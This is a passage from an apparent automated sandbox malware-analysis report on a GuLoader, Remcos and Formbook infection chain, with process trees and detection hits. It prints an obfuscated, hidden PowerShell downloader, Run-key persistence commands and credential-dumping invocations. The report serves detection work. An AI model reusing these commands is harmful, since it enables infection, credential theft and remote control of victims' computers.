$Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,e4 t ');Tilfredsstillelse (Viscometres ' H$Pag il RoKrbP.aRilVe:InFVuuPosUni Bo Bn,os .a TaRerBeeArn aeU =Am( ,TS.eDusUntE,-ciPUna tMihMa I$VaRBle ahDuaUnrEmd eFenGa)Pr ') ;Tilfredsstillelse (Viscometres ' $ IgArlBlocob Na,ulAr: kutadAgs ,i Ug TeFon UdJee S=F $,og Jl,roR,bEgaTalAf:R APomAlpFaeWirTeeCamNoeU tHirEkeFanNoePi+to+Au%.e$FaL AeGav pe .r e SdSkeTasIm..ucChol uPhn.otLo ') ;$Bageriers=$Leveredes[$udsigende];}$Callovian=319492;$Malaceae=27246;Tilfredsstillelse (Viscometres ' a$Lig.bl OoBab Haunl T:,hXPueEknSto ,pBeh oAmn BtToimacGa2 E4B 9Du Un=M, L.G.reUntTr- CCFuo.rn.utVee nSpt O F$stRHyeMahCia .r,edMaeKknDi ');Tilfredsstillelse (Viscometres ' $AmgTrlG,oOvbNoa,ul A:.eHGry.epIno Cc nh IoTel ,eResTotF,e ArB,i BnD.eLkmApi.ra.s En=Gr ,e[diS .yRes rt MeS.m a. oCT,osonV,vB.eBerG.tBe] s:Re:U,FR,rraoB mAyBSkahos,aeSt6.h4DuSCotI r.riConGrgRe(Sp$ScX AeAbnS,oInpO.h DoavnMetLiiOvcVa2B,4Ra9 ) , ');Tilfredsstillelse (Viscometres ',o$.rgf,l KoDyb,oaPhlT :SaG dhKreHatInt KoAne Ms S ,e=Ge K,[N,S TyIbs,at,fecomIn. eTlae Sx Rt U. SESpnS cAroFod,eiPanN,ggi]Ko:Ud:VeA.nSUnC.nIApI R.CyGPaeBitPoS RtAfrC iNenTagUd( B$ HH.yPapE o Gc.eh AoTal,ee BsRet e Tr oi Kn SestmFiiAcaBl)Bl ');Tilfredsstillelse (Viscometres ',i$PrgPal Po vbPeaL.l L:GoxL,yPrl,ooPapCoyOprP.o agStrPrak.p ohU,yBl=si$ oG PhDae ftUttSyoOre.rsHy. .s KuTybInsCatAprDriL.nw gTa(,a$PhCNiaE.lBilFloBrvB,i.aaKonMa,.e$inMKeaTrl MaUncLae.aa eE.)G ');Tilfredsstillelse $xylopyrography;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                • cmd.exe (PID: 1436 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belinda103.Eft && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • wab.exe (PID: 1244 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
                  • cmd.exe (PID: 6628 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bilateralities" /t REG_EXPAND_SZ /d "%Arrestationernes110% -w 1 $Faucals83=(Get-ItemProperty -Path 'HKCU:\sttyskers\').talevant;%Arrestationernes110% ($Faucals83)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                    • conhost.exe (PID: 6664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                    • reg.exe (PID: 6780 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bilateralities" /t REG_EXPAND_SZ /d "%Arrestationernes110% -w 1 $Faucals83=(Get-ItemProperty -Path 'HKCU:\sttyskers\').talevant;%Arrestationernes110% ($Faucals83)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
                  • qeKrnFkDzDT.exe (PID: 5568 cmdline: "C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
                    • srdelayed.exe (PID: 744 cmdline: "C:\Windows\SysWOW64\srdelayed.exe" MD5: B5F31FDCE1BE4171124B9749F9D2C600)
                    • relog.exe (PID: 5004 cmdline: "C:\Windows\SysWOW64\relog.exe" MD5: DA20D543A130003B427AEB18AE2FE094)
                      • qeKrnFkDzDT.exe (PID: 792 cmdline: "C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
                      • firefox.exe (PID: 3408 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
          • wab.exe (PID: 7584 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nywdnxhzquvbdzxsrjdoxzvr" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 7588 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nywdnxhzquvbdzxsrjdoxzvr" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 7600 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\yakooqrtecnnfflwatqqaeiadgh" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 4208 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iupgoicvskfsqlharedrlrcrlmrxexz" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\sfvnspt.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000005.00000002.2206071533.0000000008740000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      0000001E.00000002.4222881972.0000000003F90000.00000040.00000001.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x8fd9:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      00000020.00000002.4221469550.0000000003500000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000020.00000002.4221469550.0000000003500000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x2abc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0x1411f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        00000014.00000002.3003059273.00000000059E7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
          Click to see the 25 entries

          Other

          SourceRuleDescriptionAuthorStrings
          amsi64_7616.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            amsi32_7860.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
            • 0xd8da:$b2: ::FromBase64String(
            • 0xc95a:$s1: -join
            • 0x6106:$s4: +=
            • 0x61c8:$s4: +=
            • 0xa3ef:$s4: +=
            • 0xc50c:$s4: +=
            • 0xc7f6:$s4: +=
            • 0xc93c:$s4: +=
            • 0x15f3b:$s4: +=
            • 0x15fbb:$s4: +=
            • 0x16081:$s4: +=
            • 0x16101:$s4: +=
            • 0x162d7:$s4: +=
            • 0x1635b:$s4: +=
            • 0xd17b:$e4: Get-WmiObject
            • 0xd36a:$e4: Get-Process
            • 0xd3c2:$e4: Start-Process
            • 0x16bd8:$e4: Get-Process
            amsi32_5288.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi32_8084.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xa1b3:$b2: ::FromBase64String(
              • 0x921a:$s1: -join
              • 0xffaf:$s3: Reverse
              • 0x29c6:$s4: +=
              • 0x2a88:$s4: +=
              • 0x6caf:$s4: +=
              • 0x8dcc:$s4: +=
              • 0x90b6:$s4: +=
              • 0x91fc:$s4: +=
              • 0x12635:$s4: +=
              • 0x126b5:$s4: +=
              • 0x1277b:$s4: +=
              • 0x127fb:$s4: +=
              • 0x129d1:$s4: +=
              • 0x12a55:$s4: +=
              • 0x9a4e:$e4: Get-WmiObject
              • 0x9c3d:$e4: Get-Process
              • 0x9c95:$e4: Start-Process
              • 0x132b9:$e4: Get-Process

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Script Interpreter Execution From Suspicious Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Andragendet8.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Andragendet8.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 7328, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Andragendet8.vbs" , ProcessId: 7360, ProcessName: wscript.exe
              Sigma detected: Suspicious Script Execution From Temp Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Andragendet8.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Andragendet8.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 7328, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Andragendet8.vbs" , ProcessId: 7360, ProcessName: wscript.exe
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Andragendet8.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Andragendet8.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 7328, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Andragendet8.vbs" , ProcessId: 7360, ProcessName: wscript.exe
              Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ /d "%outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ /d "%outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 7328, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ /d "%outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)", ProcessId: 5904, ProcessName: cmd.exe
              Sigma detected: CurrentVersion Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 4504, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Almindeligheden
              Sigma detected: Direct Autorun Keys Modification
              Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ /d "%outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ /d "%outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ /d "%outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5904, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ /d "%outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)", ProcessId: 4504, ProcessName: reg.exe
              Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ /d "%outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ /d "%outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 7328, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ /d "%outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)", ProcessId: 5904, ProcessName: cmd.exe
              Sigma detected: Suspicious Powershell In Registry Run Keys
              Source: Registry Key setAuthor: frack113, Florian Roth (Nextron Systems): Data: Details: %outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 4504, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Almindeligheden
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Andragendet8.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Andragendet8.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 7328, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Andragendet8.vbs" , ProcessId: 7360, ProcessName: wscript.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGti

              Suricata Signatures

              Timestamp:2024-08-28T14:04:42.147766+0200
              SID:2855464
              Severity:1
              Source Port:49768
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-08-28T14:04:15.934465+0200
              SID:2855464
              Severity:1
              Source Port:49760
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-08-28T14:03:08.970058+0200
              SID:2855465
              Severity:1
              Source Port:49745
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-08-28T14:04:44.668227+0200
              SID:2855465
              Severity:1
              Source Port:49769
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-08-28T14:02:33.150777+0200
              SID:2803270
              Severity:2
              Source Port:49744
              Destination Port:80
              Protocol:TCP
              Classtype:Potentially Bad Traffic
              Timestamp:2024-08-28T14:04:05.109115+0200
              SID:2855465
              Severity:1
              Source Port:49757
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-08-28T14:01:49.458361+0200
              SID:2803270
              Severity:2
              Source Port:49737
              Destination Port:443
              Protocol:TCP
              Classtype:Potentially Bad Traffic
              Timestamp:2024-08-28T14:04:10.871771+0200
              SID:2855464
              Severity:1
              Source Port:49758
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-08-28T14:03:43.242699+0200
              SID:2855464
              Severity:1
              Source Port:49750
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-08-28T14:04:29.050512+0200
              SID:2855464
              Severity:1
              Source Port:49764
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-08-28T14:03:59.981894+0200
              SID:2855464
              Severity:1
              Source Port:49755
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-08-28T14:01:55.733878+0200
              SID:2032777
              Severity:1
              Source Port:57484
              Destination Port:49738
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-08-28T14:03:25.070543+0200
              SID:2855464
              Severity:1
              Source Port:49746
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-08-28T14:05:12.409303+0200
              SID:2855465
              Severity:1
              Source Port:49777
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-08-28T14:04:39.621945+0200
              SID:2855464
              Severity:1
              Source Port:49767
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-08-28T14:05:09.964722+0200
              SID:2855464
              Severity:1
              Source Port:49776
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-08-28T14:05:18.919734+0200
              SID:2855464
              Severity:1
              Source Port:49778
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-08-28T14:04:24.326359+0200
              SID:2032777
              Severity:1
              Source Port:57484
              Destination Port:49738
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-08-28T14:04:23.975590+0200
              SID:2855464
              Severity:1
              Source Port:49762
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-08-28T14:03:27.599191+0200
              SID:2855464
              Severity:1
              Source Port:49747
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-08-28T14:01:55.002482+0200
              SID:2032776
              Severity:1
              Source Port:49738
              Destination Port:57484
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-08-28T14:03:45.776632+0200
              SID:2855464
              Severity:1
              Source Port:49751
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-08-28T14:03:32.741111+0200
              SID:2855465
              Severity:1
              Source Port:49749
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-08-28T14:04:53.283615+0200
              SID:2855464
              Severity:1
              Source Port:49771
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-08-28T14:04:51.095333+0200
              SID:2855464
              Severity:1
              Source Port:49770
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-08-28T14:04:58.730195+0200
              SID:2855465
              Severity:1
              Source Port:49773
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-08-28T14:04:26.541437+0200
              SID:2855464
              Severity:1
              Source Port:49763
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-08-28T14:05:04.819790+0200
              SID:2855464
              Severity:1
              Source Port:49774
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-08-28T14:04:55.821968+0200
              SID:2855464
              Severity:1
              Source Port:49772
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-08-28T14:05:07.328379+0200
              SID:2855464
              Severity:1
              Source Port:49775
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-08-28T14:03:50.835146+0200
              SID:2855465
              Severity:1
              Source Port:49753
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-08-28T14:03:57.553845+0200
              SID:2855464
              Severity:1
              Source Port:49754
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-08-28T14:04:13.389766+0200
              SID:2855464
              Severity:1
              Source Port:49759
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-08-28T14:04:18.440443+0200
              SID:2855465
              Severity:1
              Source Port:49761
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-08-28T14:04:31.580553+0200
              SID:2855465
              Severity:1
